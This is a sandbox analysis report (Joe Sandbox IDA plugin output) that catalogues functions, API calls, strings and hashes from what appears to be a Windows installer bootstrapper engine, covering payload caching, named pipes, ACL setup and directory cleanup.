Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
String ID: =S$ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
API String ID: 2748437055-3119462786
Opcode ID: b48bc95c209a79673142636d3c3ef484aede47a0e491324b6ba6d3f4dea8628c
Instruction ID: 4ef379d194cec92fe8bba7e1cdddaa3144daf702283e61be6c94c0afdbd09ab3
Opcode Fuzzy Hash: b48bc95c209a79673142636d3c3ef484aede47a0e491324b6ba6d3f4dea8628c
Instruction Fuzzy Hash: DD22DB71A48326BEDF205A94CC45EAEBA659B06734F300322F534BE3D1D7719E40E6E2

Function 00093BC3 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 311fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,?,00000001,00000000,?), ref: 00093C3F
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093C52
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00093C9D
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093CA7
GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00093CF5
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093CFF
FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00093D52
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093D63
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00093E3D
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00093E51
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00093E78
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00093E9B
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00093EB4
FindNextFileW.KERNEL32(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00093EC4
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093ED9
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093F08
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093F2A
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093F4C
RemoveDirectoryW.KERNEL32(?,?,?,?,00000001,00000000,?), ref: 00093F63
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093F6D
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00093F93
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093FAE
FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 00093FE4

Strings

*.*, xrefs: 00093D2B
dirutil.cpp, xrefs: 00093C75, 00093EF9
DEL, xrefs: 00093E6C

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: *.*$DEL$dirutil.cpp
API String ID: 1544372074-1252831301
Opcode ID: d98449a40843df5ab124a2bd57021a131eb2e610052e5dc3e34e8d14ed0c85cb
Instruction ID: 8689e820988c9322a6107a671bcb4a86fef128cb1b577c386d27e4ccf3b56d66
Opcode Fuzzy Hash: d98449a40843df5ab124a2bd57021a131eb2e610052e5dc3e34e8d14ed0c85cb
Instruction Fuzzy Hash: B3B1B971E01635EAEF705A758C44BEAB6F5AF44750F0102A5ED09F7190DB368E80DFA0

Function 000D15CB Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 000D166B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000D1675
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 000D16C2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000D16C8
CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 000D1702
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000D1708
CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 000D1748
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000D174E
CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 000D178E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000D1794
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 000D17D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000D17DA
SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 000D18BD
LocalFree.KERNEL32(?), ref: 000D19DC

Strings

srputil.cpp, xrefs: 000D1696

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CreateKnownWell$DescriptorEntriesFreeInitializeLocalSecurity
String ID: srputil.cpp
API String ID: 3627156773-4105181634
Opcode ID: e6cbf8cf441f9c5f0c3916874976204f71526809211b47d6cb9eb1f5fb37f7da
Instruction ID: b0d88c71a63959a90115839dc8371758807251d63ba297303ceb48764e87cb8a
Opcode Fuzzy Hash: e6cbf8cf441f9c5f0c3916874976204f71526809211b47d6cb9eb1f5fb37f7da
Instruction Fuzzy Hash: DEB11372D41329AAEB209BA58D44BEBBBFCEB08740F014167FD09F7150E7749D848AB4

Function 000BC0FA Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 364COMMON

Download Yara Rule

Strings

Failed to allocate memory for dependency providers., xrefs: 000BC481
Failed to allocate memory for pseudo bundle payload hash., xrefs: 000BC275
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 000BC186
Failed to copy version for pseudo bundle., xrefs: 000BC4D0
Failed to copy key for pseudo bundle., xrefs: 000BC30A
Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 000BC14D
Failed to copy local source path for pseudo bundle., xrefs: 000BC203
Failed to append relation type to install arguments for related bundle package, xrefs: 000BC371
Failed to copy download source for pseudo bundle., xrefs: 000BC231
Failed to copy cache id for pseudo bundle., xrefs: 000BC327
Failed to copy key for pseudo bundle payload., xrefs: 000BC1BB
Failed to copy display name for pseudo bundle., xrefs: 000BC4F2
pseudobundle.cpp, xrefs: 000BC141, 000BC17A, 000BC269, 000BC475
Failed to copy install arguments for related bundle package, xrefs: 000BC34C
Failed to copy repair arguments for related bundle package, xrefs: 000BC398
Failed to append relation type to repair arguments for related bundle package, xrefs: 000BC3B9
Failed to append relation type to uninstall arguments for related bundle package, xrefs: 000BC40C
Failed to copy filename for pseudo bundle., xrefs: 000BC1DF
Failed to copy uninstall arguments for related bundle package, xrefs: 000BC3EB
-%ls, xrefs: 000BC114

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
API String ID: 1357844191-2832335422
Opcode ID: 6835bf6f1789e43249f30d06052a78340ca345d44b5838e96e38f199d96aae73
Instruction ID: 21e46ba769dbbb38d8c6529c2e2b11440b55a6967b8e247d5d0b01972c1b26a6
Opcode Fuzzy Hash: 6835bf6f1789e43249f30d06052a78340ca345d44b5838e96e38f199d96aae73
Instruction Fuzzy Hash: 67C1BF72A00656BFEB259F68C851EFA76E8BF08710B044129FD15EB352DB71ED109B90

Function 000A69CC Relevance: 33.6, APIs: 6, Strings: 13, Instructions: 358synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0009D39D: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,000A6E4B,000000B8,00000000,?,00000000,75C0B390), ref: 0009D3AC
Part of subcall function 0009D39D: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0009D3BB
Part of subcall function 0009D39D: LeaveCriticalSection.KERNEL32(000000D0,?,000A6E4B,000000B8,00000000,?,00000000,75C0B390), ref: 0009D3D0

ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 000A6D9A
CloseHandle.KERNEL32(00000000), ref: 000A6DA3
CloseHandle.KERNEL32(@G,?,00000000,?,00000000,00000001,00000000), ref: 000A6DC0

Strings

Another per-user setup is already executing., xrefs: 000A6AF1
Failed to elevate., xrefs: 000A6BA5
Failed while caching, aborting execution., xrefs: 000A6CA8
core.cpp, xrefs: 000A6A9C, 000A6C76
@G, xrefs: 000A6CBC, 000A6C0B, 000A6AB3, 000A6CDB, 000A6CF5, 000A6DBF
UX aborted apply begin., xrefs: 000A6AA6
Failed to register bundle., xrefs: 000A6C00
crypt32.dll, xrefs: 000A6CD2
Failed to set initial apply variables., xrefs: 000A6B18
Engine cannot start apply because it is busy with another action., xrefs: 000A6A2F
Another per-machine setup is already executing., xrefs: 000A6BD9
Failed to create cache thread., xrefs: 000A6C80
Failed to cache engine to working directory., xrefs: 000A6B7F

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCriticalHandleSection$CompareEnterExchangeInterlockedLeaveMutexRelease
String ID: @G$Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
API String ID: 322611130-526334586
Opcode ID: d9ce182108057294e5fd2cccac8b233a816d39956247acbd24460dcb04eff18e
Instruction ID: afcfd45919403e734e06500ad38835dfdcd9ae548e17550e8f2a621ff72b399f
Opcode Fuzzy Hash: d9ce182108057294e5fd2cccac8b233a816d39956247acbd24460dcb04eff18e
Instruction Fuzzy Hash: 84C1E071E01616BFDF199BE0CC45BEEB7B8FF06305F04422AF615A6241DB72A944CBA1

Function 000944E9 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 137COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00094512
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00094519
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00094523
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00094573
GetLastError.KERNEL32 ref: 0009457D
CloseHandle.KERNEL32(?), ref: 00094677

Strings

Failed to get process token., xrefs: 00094551
Failed to schedule restart., xrefs: 00094662
Failed to adjust token to add shutdown privileges., xrefs: 000945F9
engine.cpp, xrefs: 00094547, 000945A1, 000945EF, 00094658
Failed to get shutdown privilege LUID., xrefs: 000945AB
SeShutdownPrivilege, xrefs: 00094566

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
API String ID: 4232854991-1583736410
Opcode ID: 3253593b894a7c6776450f7bb10d09710e30d64a7281311936a34bf2ea9c7129
Instruction ID: 6c24eeff9344b315f2f5195abaf339429e27a1d4b19a742c931e7b342069a5a1
Opcode Fuzzy Hash: 3253593b894a7c6776450f7bb10d09710e30d64a7281311936a34bf2ea9c7129
Instruction Fuzzy Hash: 3F41CAB2A40325EBFB205BB59C45FBBBBD8EB01751F020126FE05F6291D7648D0196F6

Function 000A4CE8 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 161pipeCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 000A4D16
GetLastError.KERNEL32(?,00000000,?,?,0009442A,?), ref: 000A4D1F
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0009442A,?), ref: 000A4DC0
GetLastError.KERNEL32(?,0009442A,?), ref: 000A4DCD
CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0009442A,?), ref: 000A4E93
LocalFree.KERNEL32(00000000,?,0009442A,?), ref: 000A4EC1

Strings

Failed to create pipe: %ls, xrefs: 000A4DFE, 000A4E84
Failed to allocate full name of cache pipe: %ls, xrefs: 000A4E2A
\\.\pipe\%ls.Cache, xrefs: 000A4E14
D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 000A4D11
Failed to create the security descriptor for the connection event and pipe., xrefs: 000A4D4D
\\.\pipe\%ls, xrefs: 000A4D77
pipe.cpp, xrefs: 000A4D43, 000A4DF1, 000A4E77
Failed to allocate full name of pipe: %ls, xrefs: 000A4D8D

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: DescriptorErrorLastSecurity$CloseConvertCreateFreeHandleLocalNamedPipeString
String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 3065245045-3253666091
Opcode ID: b087e6af30e30016d66ae56ca2e0ec235aed20af057d557b9d9f11e1e98dae00
Instruction ID: 6db29acf405ed2cb84fbf48f89da60a5a5d876a9903151fb563c2c052b919961
Opcode Fuzzy Hash: b087e6af30e30016d66ae56ca2e0ec235aed20af057d557b9d9f11e1e98dae00
Instruction Fuzzy Hash: 5C51D275E40315FFEB219AA5DC46BEEBBA4EF04710F11412AFE10BA2D1D3B54E409AA1

Function 000CF961 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 167encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,000A9CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 000CF9C6
GetLastError.KERNEL32 ref: 000CF9D0
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 000CFA0D
GetLastError.KERNEL32 ref: 000CFA17
CryptDestroyHash.ADVAPI32(00000000), ref: 000CFAC9
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 000CFAE0
GetLastError.KERNEL32 ref: 000CFAFB
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 000CFB33
GetLastError.KERNEL32 ref: 000CFB3D
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 000CFB76
GetLastError.KERNEL32 ref: 000CFB84

Strings

cryputil.cpp, xrefs: 000CFAB0

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CryptErrorLast$Hash$Context$AcquireCreateDestroyFileParamPointerRelease
String ID: cryputil.cpp
API String ID: 1716956426-2185294990
Opcode ID: 4743a7dd3b009596b11e513a1cfd7afc6e7606c4b7ac521aa27031de31630a06
Instruction ID: fa43c2a82fa7c6e881986e28ee747c535b2a294a04bf5844a4f587005e141576
Opcode Fuzzy Hash: 4743a7dd3b009596b11e513a1cfd7afc6e7606c4b7ac521aa27031de31630a06
Instruction Fuzzy Hash: 38519572E00225EBFB319B658C04BEB7BE9EB08741F014166BE4DE6190E7748D809AB5

Function 000A9C99 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON

Download Yara Rule

Strings

Failed to move verified file to complete payload path: %ls, xrefs: 000A9E68
Failed to create unverified path., xrefs: 000A9D69
Failed to transfer working path to unverified path for payload: %ls., xrefs: 000A9D9F
Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 000A9DC6
Failed to reset permissions on unverified cached payload: %ls, xrefs: 000A9DEC
moving, xrefs: 000A9E2C, 000A9E34
copying, xrefs: 000A9E27
Failed to concat complete cached path., xrefs: 000A9CEF
Failed to get cached path for package with cache id: %ls, xrefs: 000A9CC3

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
API String ID: 0-1289240508
Opcode ID: 42d0123bbb0467fc5a6370b54bbb9148a291303bb792cb8a74c03cd8496c5a6c
Instruction ID: b8778cff39e7cd677fefe77b8cb0279dda2ebc7ae639e296c627521faf842232
Opcode Fuzzy Hash: 42d0123bbb0467fc5a6370b54bbb9148a291303bb792cb8a74c03cd8496c5a6c
Instruction Fuzzy Hash: 64518135E40219FBDF22ABD0CC02FDDBB76AF15750F104165FA0075262EB724EA0AB91

Function 00096184 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 000961D2
GetLastError.KERNEL32 ref: 000961DC

Strings

variable.cpp, xrefs: 00096200
Failed to get OS info., xrefs: 0009620A
Failed to set variant value., xrefs: 00096314

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastVersion
String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
API String ID: 305913169-1971907631
Opcode ID: d70a3663c5fb1677f00c56c2eaa1a41f6852c247bbc472ece34e397d99c42d62
Instruction ID: 62e2d6479719be65aa73ae5ec844fe1638ce9e2b2baa7716330d285d2194c20c
Opcode Fuzzy Hash: d70a3663c5fb1677f00c56c2eaa1a41f6852c247bbc472ece34e397d99c42d62
Instruction Fuzzy Hash: D7419471E05228ABDF309BA9CC45EEE7BB8EB89710F01419AF509E7150DA359E81DB60

Function 000CA85E Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 000CA9A4

Strings

, feature: %2!ls!, state: %3!hs!, xrefs: 000CA967, 000CA9F8, 000CADF1
1#QNAN, xrefs: 000CBBAA
1#IND, xrefs: 000CBB9C
1#SNAN, xrefs: 000CBBA3
1#INF, xrefs: 000CBBB1

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: __floor_pentium4
String ID: , feature: %2!ls!, state: %3!hs!$1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-354043315
Opcode ID: 83c4771a5593f5a4c8b6e6338647a953499857e43db9599a0dd3b9a91c9c8269
Instruction ID: 038f5cc6376158f181d788145bdbe287c468b3ebec1410713bf3efd8f669f646
Opcode Fuzzy Hash: 83c4771a5593f5a4c8b6e6338647a953499857e43db9599a0dd3b9a91c9c8269
Instruction Fuzzy Hash: CDC23771E086288BDB65CF289D41BEEB3B9EB45305F1441EED84EE7241E774AE818F41

Function 000CFDC2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000FB60C,00000000,?,?,?,?,000B1014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 000CFDF0
GetCurrentProcessId.KERNEL32(00000000,?,000B1014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 000CFE00
GetCurrentThreadId.KERNEL32 ref: 000CFE09
GetLocalTime.KERNEL32(8007139F,?,000B1014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 000CFE1F
LeaveCriticalSection.KERNEL32(000FB60C,?,00000000,00000000,0000FDE9), ref: 000CFF12

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 000CFEB9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: c89ae1e42d72b224d06b701562305189c49848c226314114b11f4b1e59bcd751
Instruction ID: 99c52db0c9ecc192be1fed818097c94dd4c1682bb0ff8346a209016ca55acd0d
Opcode Fuzzy Hash: c89ae1e42d72b224d06b701562305189c49848c226314114b11f4b1e59bcd751
Instruction Fuzzy Hash: C9415F72901219EBDF209BA4DC45BBEB7F5EF08711F50403AFA01E6661D7388D41DBA2

Function 000A993E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,00000000,.unverified,?), ref: 000A99ED
lstrlenW.KERNEL32(?), ref: 000A9A14
FindNextFileW.KERNEL32(00000000,00000010), ref: 000A9A74
FindClose.KERNEL32(00000000), ref: 000A9A7F

Part of subcall function 00093BC3: GetFileAttributesW.KERNEL32(?,?,?,?,00000001,00000000,?), ref: 00093C3F
Part of subcall function 00093BC3: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00093C52

Strings

*.*, xrefs: 000A99C7
.unverified, xrefs: 000A9981

Memory Dump Source

